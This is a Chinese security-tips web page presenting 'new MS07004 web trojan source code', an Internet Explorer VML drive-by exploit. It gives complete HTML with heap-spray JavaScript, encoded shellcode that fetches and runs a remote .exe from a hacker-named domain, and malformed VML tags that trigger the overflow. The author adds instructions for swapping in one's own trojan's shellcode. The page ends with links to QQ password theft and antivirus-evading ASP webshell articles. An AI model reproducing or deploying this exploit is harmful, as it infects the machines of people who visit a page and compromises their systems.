新编MS07004网页木马源码代码

所属分类: 实用技巧 / 安全教程 阅读数: 1947
收藏 0 赞 0 分享
复制代码 代码如下:

<html xmlns:v="urn:schemas-microsoft-com:vml"> 
<head> 
<object id="VMLRender" 
classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"> 
</object> 
<style> 
v:* { behavior: url(#VMLRender); } 
</style> 
</head> 
<body> 
<SCRIPT language="javascript"> 
setTimeout("document.location.reload(false)",2000); 
shellcode =unescape("%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u2E31%u6168%u6B63%u7265%u6F6F%u6F63%u2F6D%u2E31%u7865%u0065"); 
bigblock = unescape("%u0505%u0505"); 
headersize = 20; 
slackspace = headersize+shellcode.length; 
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (i=0;i<450;i++) memory[i] = block + shellcode; 
</script> 

<v:rect style='width:120pt;height:80pt' fillcolor="red" > 
<v:recolorinfo NumColOrS="97612895" recolorstate="t"> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v:recolorinfoentry tocolor="rgb(1,0,64)" recolortype="1285" 
lbcolor="rgb(1,0,64)" forecolor="rgb(1,0,64)" backcolor="rgb(1,0,64)" 
fromcolor="rgb(1,0,64)" lbstyle ="32" bitmaptype="3"/> 
<v/recolorinfo> 
</html> 


事先说明`这个不是平衡堆栈处理过`平衡堆栈的貌似要1W大元。

我修改的这个还算可以,成功后会关掉IE,但不出现IE错误,至于卡不卡`我没感觉出来,虚拟机没办法感觉,,使用方法,用幻影的那个生成器`把自己的木马生成出来`把shellcode替换掉本代码里,就是

shellcode =unescape("%u9090%u9090%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u772F%u7777%u2E31%u6168%u6B63%u7265%u6F6F%u6F63%u2F6D%u2E31%u7865%u0065");


另外,

bigblock = unescape("%u0505%u0505");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<450;i++) memory[i] = block + shellcode; 

这里是反着写的,带自刷新,这样效果会更好,不想自刷新`可以自己修改
更多精彩内容其他人还在看

一些通用跳转地址,XXOXX的时候有点用

近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
收藏 0 赞 0 分享

入侵过程中用过的三大门派的几个小工具[推荐]

vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
收藏 0 赞 0 分享

sql2005 sa执行命令方法总结

测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
收藏 0 赞 0 分享

几款双功能免杀超强版asp小马

几款双功能免杀超强版asp小马,对于需要查找后门的朋友可以参考下。
收藏 0 赞 0 分享

如何防范别人盗你的qq号(盗别人的qq密码)

想用别人的 qq号码,最主要的就是把别人的密码偷来,那么怎么盗别人的qq密码呢?不过,没有人会告诉你:我的密码是什么什么,请你尽情的用我的号码吧!那么,黑客是怎么去把别人的密码偷来呢
收藏 0 赞 0 分享

QQ聊天记录删除了怎么恢复 详细步骤教程

许多网友都想知道“QQ聊天记录删除了怎么恢复”,因为QQ聊天记录对于我们来说是很重要的数据。下面我们就来介绍下如何解决QQ聊天记录删除恢复的问题
收藏 0 赞 0 分享

php+mysql注入页面实现

最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
收藏 0 赞 0 分享

QQ密码被盗怎么办 (教你如何找回QQ密码)

QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码
收藏 0 赞 0 分享

QQ密码找回方法全攻略(QQ被盗怎么要回QQ密码呢)

自从本站开办以来,不断有网友来信大量重复询问同一个问题:QQ密码的破解。因为站长有限的精力,不可能一一作答,以后同样的问题我将不会回覆了,您自己看这篇教程吧
收藏 0 赞 0 分享

让你变成ASP木马高手

这篇文章主要介绍了让你变成ASP木马高手
收藏 0 赞 0 分享
查看更多